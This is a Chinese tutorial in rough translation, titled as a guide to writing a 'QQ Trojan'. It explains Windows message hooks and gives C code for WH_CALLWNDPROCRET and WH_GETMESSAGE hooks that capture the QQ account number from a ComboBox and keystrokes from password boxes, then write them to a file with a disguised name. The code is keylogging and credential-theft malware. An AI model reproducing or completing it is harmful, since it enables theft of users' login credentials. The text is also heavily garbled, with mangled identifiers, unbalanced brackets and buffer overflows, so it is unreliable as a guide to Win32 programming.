Have yourself write QQ Trojan ----- HOOK
Let us first review the Windows message classification.
• WM_XXX (except WM_COMMAND and WM_NOTIFY): ordinary Windows messages.
Hardware-input messages or window-management messages from the USER module; any class derived from CWnd can receive them.
• WM_COMMAND: command messages.
Generated by a UI object — from a menu or an accelerator key (WPARAM identifies the source of the message); any class derived from CCmdTarget is eligible to receive them.
• WM_COMMAND or WM_NOTIFY: control notification messages, sent by a control to its parent window (usually a dialog).
Standard controls such as Edit, ComboBox and ListBox use WM_COMMAND;
common controls such as ImageList, ListCtrl and TreeCtrl use WM_NOTIFY.
• WM_SYSCOMMAND: system-menu command messages, i.e. the menu that pops up when the window's title bar is right-clicked.
The following figure shows the Windows message-processing mechanism:
From the figure above you can see that the messages obtained by a thread's message pump can be intercepted by setting a message hook on that thread; that is, a message hook intercepts the message after the message pump has processed it. The commonly used message-hook types are listed below:
• WH_GETMESSAGE: monitors messages placed in the message queue with PostMessage()
• WH_CALLWNDPROC: monitors messages the system sends (SendMessage()) to the target window procedure
• WH_CALLWNDPROCRET: monitors messages after the target window procedure has processed them (SendMessage())
• WH_KEYBOARD: monitors keyboard messages
• WH_MOUSE: monitors mouse messages
To hook a window's messages, use Spy to find the window, set the type of message to capture, and start capturing; many messages will be listed. The third column of each message contains an "S", "R" or "P" character, with the following meanings:
• "S": the message was sent with SendMessage and the sender is waiting for it to return. Capture it with WH_CALLWNDPROC.
• "R": the message was sent with SendMessage and has already been processed by the target window's procedure. Capture it with WH_CALLWNDPROCRET.
• "P": the message was posted to the message queue with PostMessage and requires no return. Capture it with WH_GETMESSAGE.
Because the number and password of the QQ to be taken, you need to hook the two types of control window messages, one is ComboBox, and the other is of course Edit.
HHOOK1 = SETWINDOWSHOKEX (Wh_CallWndProcret, CallWndretProc, G_HINSTDLL, DWTHREADID);
The Wh_CallWndProcret intercepts the contents of the combo box taken by WM_GetText, and also seizes the contents of the WM_KILLFOCUS to obtain the edit box (non-password box).
HHOOK2 = SETWINDOWSHOKEX (Wh_getMessage, getmsgproc, g_hinstdll, dwthreadid);
Wh_getMessage intercepts the WM_CHAR message to get the keyboard input.
Below is the code for the two hook message-processing functions:
// File-scope state of the hook DLL.  Both hook procedures below execute inside
// the process that owns the hooked thread (SetWindowsHookEx maps this DLL
// there, see the two calls quoted above), so everything outside the "Shared"
// segment is a per-process copy.  The observable artefacts of the technique,
// as far as this page shows them, are that mapped DLL and the output file
// named by file_path_name.
Hinstance g_hinstdll = null; // module handle of this DLL, passed to SetWindowsHookEx
HWND G_HWNDCOMBOX = NULL; // Handle of window to be monitoredhwnd g_hwndited = null;
// NOTE(review): the comment on the previous line appears to have swallowed a
// second declaration during extraction -- the Edit-window handle g_hwndedit
// that both hook procedures read and write is not declared anywhere else here.
TCHAR G_LPSZEDITDUMP [32] = {0}; // characters typed into the EDIT control, accumulated by GetMsgProc
// Fixed 32-TCHAR accumulator; GetMsgProc appends with lstrcat and nothing
// bounds the length, so it overflows once the buffer is full.
Bool g_fsingleenter = true; // toggle: the author observes one keystroke posts WM_CHAR twice, so only every other one is kept
//
#pragma data_seg ("Shared")
// Named data section for the values every process that loads the DLL must
// agree on (hook handles and the watched class names).  Whether the section
// is actually shared between processes depends on a linker /SECTION directive
// that is not shown on this page.
HHOOK G_HHOOK1 = NULL; // Hook Handle for Thread-Specific Hook (WH_CALLWNDPROCRET, first SetWindowsHookEx call above)
HHOOK G_HHOOK2 = NULL; // hook handle for the WH_GETMESSAGE hook (second SetWindowsHookEx call above)
Const char g_classname1 [] = "comboBox"; // window class compared against in CallWndretProc (WM_GETTEXT path)
Const char g_classname2 [] = "edit"; // window class compared against in both hook procedures
#define file_path_name "c: //ravdataq.dat"
// Output file for the captured text, presumably used by Fzwritefile (not on
// this page).  The path string looks garbled ("c: //") in this copy and is
// left as-is.
#pragma data_seg ()
/
// WH_CALLWNDPROCRET hook procedure (installed by the first SetWindowsHookEx
// call quoted above).  It runs after the target window procedure has handled
// a sent message and acts on two of them:
//   WM_GETTEXT   - when the receiving window has class g_classname1, the
//                  ComboBox's current selection index and the returned text
//                  are formatted and handed to Fzwritefile (not on this page).
//   WM_KILLFOCUS - when the receiving window has class g_classname2, the text
//                  accumulated in G_LPSZEDITDUMP by GetMsgProc is formatted as
//                  "Password =" or "Content =" depending on ES_PASSWORD.
// Every path returns CallNextHookEx so later hooks in the chain still run.
// NOTE(review): this copy is garbled (casing, brackets, "/ /" comments, and
// the braces do not balance), so these comments describe the evident intent
// rather than compilable code.
Static Lresult WinApi CallWndretProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
TCHAR LPSZCLASSNAME [16] = {0}; // class name of the window the message was sent to
INT NINDEX = 0; // index of the ComboBox's current selection
TCHAR LPSZCOMBOBOX [16] = {0}; // text of the ComboBox selection
TCHAR LPSZDUMP [64] = {0}; // formatted line written for the ComboBox
TCHAR LPSTRING [64] = {0}; // formatted line written for the Edit box
CWPRETSTRUCT * PMSG = (cwpretstruct *) LPARAM; // lParam of a WH_CALLWNDPROCRET hook is a CWPRETSTRUCT*
// wParam is non-zero when the message was sent from another thread; only
// same-thread sends with nCode == HC_ACTION are inspected, the rest are passed on.
IF (ncode! = hc_action || wparam! = NULL)
{
Return (CallNexthooKex (G_HHHHOOK1, NCODE, WPARAM, LPARAM); // NOTE(review): parentheses do not balance in this copy
}
Switch (PMSG-> Message)
{
Case WM_GETTEXT:
// GetClassName takes a character count; SIZEOF gives bytes, which is twice
// the buffer length in a Unicode (TCHAR == WCHAR) build.
GetClassName (PMSG-> HWND, LPSZCLASSNAME, SIZEOF (LPSZCLASSNAME);
// Latch the first ComboBox-class window seen as the one to watch
IF ((0 == lstrcmp (lpszclassname, g_classname1)) &&
(NULL == g_hwndcombox))
{
G_hwndcomboBox = PMSG-> hwnd;
}
IF (g_hwndcomboBOX == pmsg-> hwnd)
{
// Get the index of the current ComboBox selection (CB_ERR when nothing is selected)
NINDEX = (int) sendMessage (g_hwndcombobox,
CB_Getcurseel, 0, 0);
IF (CB_ERR == NINDEX)
{
// Nothing selected: pass the message on without recording anything
Return (CallNexthooKex (G_HHHHOOK1, NCODE, WPARAM, LPARAM);
}
// For WM_GETTEXT the message's lParam points at the buffer the text was
// written into.  The copy is unbounded (lstrcpy into a 16-TCHAR array), and
// the destination name differs from the declaration (LPSZCOMBOX vs LPSZCOMBOBOX).
LSTRCPY (LPSZCOMBOX, LPCSTR (PMSG-> LPARAM); WSPrintf (lpszdump, "index =% d content =% s",
NINDEX, LPSZCOMBOX);
// Write the formatted line to the output file
Fzwritefile (LPSZDUMP);
}
Break;
Case WM_KILLFOCUS:
GetClassName (PMSG-> HWND, LPSZCLASSNAME, SIZEOF (LPSZCLASSNAME); // same byte/character-count mismatch as above
// Only act on an Edit-class window once GetMsgProc has latched one into g_hwndedit
IF ((LSTRCMP (lpszclassname, g_classname2) == 0) &&
(g_hwndedit! = NULL))
{
// Decide the label from the window style: ES_PASSWORD marks a password box
// ("(:" is presumably a garbled "::" scope qualifier in this copy)
IF (: getwindowlong (g_hwndedit, gwl_style) &
ES_PASSWORD)
{
WSPrintf (LPSTRING, "Password =% S", (LPTSTSTSTST) G_LPSZEDITDUMP);
}
Else
{
WSPrintf (LPString, "Content =% S", (LPTSTSTSTSTST) G_LPSZEDITDUMP);
// NOTE(review): as bracketed in this copy the write and the reset below sit
// inside the non-password branch only, so the "Password =" line would never
// reach Fzwritefile; a closing brace was probably lost in extraction.
FZWritefile (LPSTRING);
// Reset the latched Edit window and its accumulated text
g_hwndedit = NULL;
ZeromeMory (g_lpszeditdump, 32);
}
Break;
}
Return (CallNexthooKex (G_HHHHOOK1, NCODE, WPARAM, LPARAM); // NOTE(review): parentheses do not balance in this copy
}
/
// WH_GETMESSAGE hook procedure (installed by the second SetWindowsHookEx call
// quoted above).  It sees messages retrieved from the hooked thread's queue;
// the rest of the hook chain is called first and its result is returned
// unchanged.  For WM_CHAR to a window of class g_classname2 it latches the
// first such window into g_hwndedit and appends every other character to
// G_LPSZEDITDUMP, which CallWndretProc later formats on WM_KILLFOCUS.
// NOTE(review): this copy is garbled (casing, "'/ 0'"), so the comments
// describe the evident intent rather than compilable code.
Static Lresult WinApi GetMsgProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
TCHAR LPSTR [2] = {0}; // one-character string appended to the accumulator
// NOTE(review): as spelled here the name collides with the Win32 LPSTR typedef;
// presumably a casing artefact of this copy.
CHAR LPSZCLASSNAME [16] = {0}; // class name of the window the message is for (CHAR here, TCHAR in CallWndretProc)
TCHAR CR = 0x0d; // carriage return; not referenced anywhere in this function
LResult Lresult = CallNexthookex (g_hhook2, ncode, wparam, lparam); // chain runs before the inspection below
PMSG PMSG = (PMSG) LPARAM; // lParam of a WH_GETMESSAGE hook is a MSG*
IF (ncode == hc_action)
{
Switch (PMSG-> Message)
{
Case wm_char: // character input to the window that currently has focus
// Same byte/character-count mismatch as in CallWndretProc: SIZEOF is bytes,
// GetClassName wants characters.
GetClassName (PMSG-> HWND, LPSZCLASSNAME, SIZEOF (LPSZCLASSNAME);
// Latch the first Edit-class window seen until CallWndretProc resets g_hwndedit
IF ((LSTRCMP (lpszclassname, g_classname2) == 0) &&
(g_hwndedit == null))
{
g_hwndedit = pmsg-> hwnd;
}
IF (g_hwndedit == pmsg-> hwnd)
{
// Keep only every other WM_CHAR (see the g_fsingleenter comment at file scope)
IF (g_fsingleenter)
{
LPSTR [0] = (tchar) (PMSG-> WPARAM); // WM_CHAR carries the character code in wParam
LPSTR [1] = '/ 0'; // garbled in this copy; evidently the terminating '\0'
// Unbounded append into the 32-TCHAR G_LPSZEDITDUMP: overflows once 31
// characters have been collected without an intervening WM_KILLFOCUS.
LSTRCAT ((LPTSTR) g_lpszeditdump, (lptstr) LPSTR);
g_fsingleenter = false;
}
Else
{
g_fsingleenter = true;
}
}
Break;
}
}
Return (LRESULT); // the CallNextHookEx result computed above
}
For DLL debugging, see my other article, "DLL debugging".